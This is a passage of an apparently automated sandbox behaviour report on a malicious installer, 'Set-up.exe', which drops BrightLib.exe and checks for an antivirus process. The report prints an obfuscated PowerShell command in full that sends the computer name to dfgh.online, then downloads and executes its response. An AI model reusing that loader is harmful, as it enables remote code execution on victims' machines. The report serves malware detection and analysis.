              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: iconcodecservice.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: twinui.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: pdh.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: shdocvw.dll
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpWindow found: window name: TMainFormJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Set-up.exeStatic file information: File size 76245718 > 1048576
              Source: Set-up.exeStatic PE information: section name: RT_CURSOR
              Source: Set-up.exeStatic PE information: section name: RT_BITMAP
              Source: Set-up.exeStatic PE information: section name: RT_ICON
              Source: Set-up.exeStatic PE information: section name: RT_MENU
              Source: Set-up.exeStatic PE information: section name: RT_DIALOG
              Source: Set-up.exeStatic PE information: section name: RT_STRING
              Source: Set-up.exeStatic PE information: section name: RT_ACCELERATOR
              Source: Set-up.exeStatic PE information: section name: RT_GROUP_ICON

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; YJump to behavior
              Source: 00ARFM6VTY24MGI8KNPL04W8K1.exe.0.drStatic PE information: real checksum: 0x9307ce should be: 0x8615ed
              Source: 00ARFM6VTY24MGI8KNPL04W8K1.tmp.6.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
              Source: 00ARFM6VTY24MGI8KNPL04W8K1.tmp.8.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
              Source: 00ARFM6VTY24MGI8KNPL04W8K1.exe.0.drStatic PE information: section name: .didata
              Source: 00ARFM6VTY24MGI8KNPL04W8K1.tmp.6.drStatic PE information: section name: .didata
              Source: 00ARFM6VTY24MGI8KNPL04W8K1.tmp.8.drStatic PE information: section name: .didata
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_009B4220 push es; ret 0_3_009B4309
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_009B4220 push es; ret 0_3_009B4309
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)Jump to dropped file
              Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DND4F.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-FT9F2.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-FT9F2.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeFile created: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-3O7DV.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeFile created: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DND4F.tmp\_isetup\_isdecmp.dllJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

